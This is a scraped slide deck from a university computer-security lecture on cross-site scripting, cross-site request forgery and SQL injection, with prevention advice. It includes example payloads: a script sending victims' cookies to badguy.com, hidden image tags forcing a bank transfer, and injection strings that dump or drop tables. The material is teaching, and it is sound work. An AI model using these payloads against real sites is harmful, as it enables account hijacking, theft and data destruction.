CSCD 303 Essential Computer Security Fall 2018

Size: px

Start display at page:

Download "CSCD 303 Essential Computer Security Fall 2018"

Briana Ramsey
5 years ago
Views:

1 CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides

2 Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server system Inject content on web pages that trick users or Inject content on web pages that trick web servers Result is stolen resources or destruction of information 2

3 Web Based Attacks 3

Application Layer APPLICATION ATTACK Finance Accounts Transactions Administration E-Commerce Knowledge Mgmt Communication Custom Code Bus.

requests Your code is tricked into doing something it should not Security requires software development expertise App Server Web Server Network

4 Application Layer APPLICATION ATTACK Finance Accounts Transactions Administration E-Commerce Knowledge Mgmt Communication Custom Code Bus. Functions Databases Legacy Systems Web Services Directories Human Resrcs Billing Application Layer Attacker sends attacks inside valid HTTP requests Your code is tricked into doing something it should not Security requires software development expertise App Server Web Server Network Layer Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests Network Layer Firewall Hardened OS Firewall Insider 4

5 Types of Web Attacks What kinds of Web attacks are popular? Inadequate validation of user input Named Attacks Below Cross site scripting, XSS Cross site request forgery, CSRF SQL Injection 5

6 Cross-site Scripting (XSS) Cross-site scripting (XSS) computer security vulnerability found in web applications Allows code injection by malicious web users into web pages viewed by other users Examples of such code include HTML code and clientside scripts An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as Same origin policy for scripts As of 2017 cross-site scripting among the top 10 web site problems 6

7 Same Origin Policy Intent is to let users visit untrusted web sites without those web sites interfering with user's session with honest web sites Same-origin policy restricts how a document or script loaded from one origin can interact with a resource from another origin Two pages have same origin if protocol, port (if one is specified), and host are the same for both pages URL Outcome Reason Success Success Failure Different protocol Failure Different port Failure Different host 7

8 Example Websites XSS d A hacker was able to insert JavaScript code into the Obama community blog section JavaScript would redirect users to Hillary Clinton website obama-website-hacked-users-redirected-to-clinton-campaign.htm Websites from FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft, Zdnet, Wired, and Newsbytes have all had XSS bugs List of websites XSS are here Example of XSS Attack 8

9 Cross Site Scripting (XSS) Recall Scripts embedded in web pages run in browsers Scripts can access cookies Get private information Manipulate page objects Controls what users see Scripts controlled by same-origin policy How could XSS occur? Web applications often take user inputs and use them as part of webpage 9 9

10 Cross-Site Scripting (XSS) Attacks

11 XSS Example User input is echoed into HTML response Example: Search field term = apple search.php responds with this page: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term]?> :... </BODY> </HTML> Is this exploitable? 11

12 XSS Example Attacker s Bad input Problem: No validation of input term Consider this link: term = <script> window.open( = + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> </script> Browser executes script: Sends badguy.com cookie for victim.com 12

13 More Details of XSS Why would user click on such a link? Phishing in webmail client (e.g. gmail). Link in doubleclick banner ad many, many ways to fool user into clicking What if badguy.com gets cookie for victim.com? Cookie can include session authentication for victim.com Or other data intended only for victim.com Violates same origin policy Lets see another picture of this more details 13

14 Consequences of XSS Attacks XSS can cause problems for end user that range in from annoyance to complete account compromise. Most severe XSS attacks involve disclosure of the user s session cookie, allowing an attacker to hijack the user s session and take over the account. Other results include disclosure of end user files, installation of Trojan horse programs, redirect user to some other page or site, or modify presentation of content 14

15 XSS Examples More examples for your viewing pleasure Good link below with many cut and paste opportunities to try this out A complete How to for XSS: 15

16 Preventing XSS Escape all user input when it is displayed Escaping converts the output to harmless html entities <script> becomes <script> but still displayed as <script> Methods: OWASP ESAPI Java Standard Tag Library (JSTL) <c:out/> OWASP XSS Prevention Cheat Sheet XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet 16

17 Preventing XSS Security Expert Coding Recommendations use the Microsoft Anti-XSS Library 17

XSS Prevention Noscript Firefox Add-on Noscript: JavaScript, Java, Flash Silverlight and possibly other executable contents are blocked by default Will be able to

18 XSS Prevention Noscript Firefox Add-on Noscript: JavaScript, Java, Flash Silverlight and possibly other executable contents are blocked by default Will be able to allow JavaScript/Java/... execution (scripts from now on) selectively, on the sites you trust Must first enable Javascript in Firefox 18

19 Cross Site Request Forgery CSRF 19

20 What is Cross Site Request Forgery? Define it Cross-Site Request Forgery (CSRF) is an attack that tricks victim into loading a page that contains a malicious request It is malicious in that it inherits identity and privileges of victim to perform an undesired function on victim's behalf Change victim's address, Change home address, or Change password, or purchase something 20

1 Attacker sets the trap on some website on the Internet (or simply via an e-mail)

site Accounts Finance Administration Transactions E-Commerce Knowledge Mgmt

Functions 2 While logged into vulnerable site,victim views attacker site <img> tag

21 1 Attacker sets the trap on some website on the Internet (or simply via an ) Application with CSRF vulnerability Hidden <img> tag contains attack against vulnerable site Accounts Finance Administration Transactions E-Commerce Knowledge Mgmt Communication Bus. Functions 2 While logged into vulnerable site,victim views attacker site <img> tag loaded by browser sends GET request (including credentials) to vulnerable site 3 Vulnerable site sees legitimate request from victim and performs the action requested 21 Custom Code

22 Cross Site Request Forgery (CSRF) Cross Site Request Forgery, also XSRF or Cross Site Reference Forgery Works by exploiting trust of site for user In the case of XSS, the user is victim In the case of CSRF, the user is an accomplice Example: Allows specific actions to be performed when requested If a user is logged into site and an attacker tricks their browser into making a request to one of these task urls, then task is performed for logged in user but the user didn t intend to do it 22

23 Dangers of CSRF Most of the functionality allowed by website can be performed by an attacker utilizing CSRF What does this mean for victims? This could include Posting content to a message board, Subscribing to an online newsletter, Performing stock trades, using a shopping cart, or Even sending an e-card 23

24 CSRF More Details Most popular ways to execute CSRF attacks Using HTML image tag, or JavaScript image object An attacker will embed these into an or website so when user loads page or , they perform a web request to any URL of attackers liking Examples follow 24

25 CSRF Code Examples HTML Methods IMG SRC <img src=" SCRIPT SRC <script src=" IFRAME SRC <iframe src=" JavaScript Methods 'Image' Object <script> var foo = new Image(); foo.src = " </script> 25

26 CSRF Example Detailed Say, online banking site performs a transfer of funds action by calling a URL such as: transfer.do?acct=attacker&amount=1000 This URL will transfer $1000 from a victim s account into the attacker s account if the victim is logged into their account within BigSafeBank website 26

CSRF Example Detailed Attacker must fool victim into clicking link and executing malicious action Attacker can create an HTML email with a tag such as: <img src="http://bigsafebank.com/transfer.do?

27 CSRF Example Detailed Attacker must fool victim into clicking link and executing malicious action Attacker can create an HTML with a tag such as: <img src=" acct=attacker&amount=1000" width="1" height="1" border="0"> When a victim views this HTML , Will see an error indicating that image could not be loaded, But browser still submits transfer request to bigsafebank.com without requiring any further interaction from the user 27

28 CSRF Example Detailed Crazy part is Even though the image was rendered unsuccessfully, Using <img> tag, an automatic http request was made that contained the victim's credentials, ie. Session Cookie Allowing server to perform the malicious action 28

29 CSRF Why Does it Happen A web application's vulnerability to CSRF is due to the following conditions: Use of certain HTML tags will result in automatic HTTP Request execution Our browsers have no way of telling if a resource referenced by an <img> tag is a legitimate image Loading of an image will happen regardless of where that image is located 29

30 CSRF Why Does it Happen More reasons why... Code within web application performs security sensitive operations in response to requests without validation of user GET requests are especially vulnerable to this type of attack, but POST requests are not immune 30

31 Fixing CSRF with CSRF Guard The Open Web Application Security Project (OWASP) Has tool, CSRF Guard, implements session-token to thwart CSRF attacks When user first visits site, application will generate and store a session specific token This session specific token is then placed in each form and link of HTML response, ensuring that this value will be submitted with next request For each subsequent request, application must verify existence of unique token parameter and compare its value to that of value stored in user's session 31

32 SQL Injection 32

33 SQL Injection Very Common vulnerability (~71 attacks/hour ) Exploits Web Databases Poorly validate user input for SQL string literal escape characters, e.g., ' Do not have strongly screened user input Example escape characters "SELECT * FROM users WHERE name = '" + username + "';" If username is set to ' or '1'='1, the resulting SQL is SELECT * FROM users WHERE name = '' OR '1'='1'; This evaluates to SELECT * FROM users displays all users 33

34 SQL Injection Example Select statement "SELECT * FROM userinfo WHERE id = " + a_variable + ";" If programmer doesn t check a_variable is a number, attacker can set a_variable = 1; DROP TABLE users SQL evaluates to SELECT * FROM userinfo WHERE id=1;drop TABLE users; Result of this query? Users table is deleted 34

35 Impact of SQL Injection - Dangerous At best: you can leak information Depending on your configuration, a hacker can Delete, alter or create data Grant direct access to the hacker Escalate privileges and even take over the OS 35

Preventing SQL injection Use Prepared Statements $id=1234 select * from accounts where id = + $id Next one is safer More exact select * from accounts where id =1234 Validate input Strong typing If

36 Preventing SQL injection Use Prepared Statements $id=1234 select * from accounts where id = + $id Next one is safer More exact select * from accounts where id =1234 Validate input Strong typing If the id parameter is a number, try parsing it into an integer Business logic validation Escape questionable characters ticks, --, semi-colon, brackets OWASP Cheat sheet 36

37 Summary Experts suggest, Internet Security model is completely flawed Made worse by Web 2.0 As developers we can at least ensure our code is not broken As users we have far less control Browser security!!!! 37

38 References CSRF Links CGI FAQ on Cross Site Request Forgery (CSRF) Art of Software Security Assessment Same Origin OWASP CSRF Site MSDN Article on CSRF Explained Wikipedia 38

39 References XSS

40 References SQL Injection Cheat Sheet SQL Prevention ection.html SQL Attacks from UnixWiz OWASP SQL Injection Sheet 40

41 End Lab this week, XSS and CSRF and SQL Injection 41

CSCD 303 Essential Computer Security Fall 2017

CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate the security of the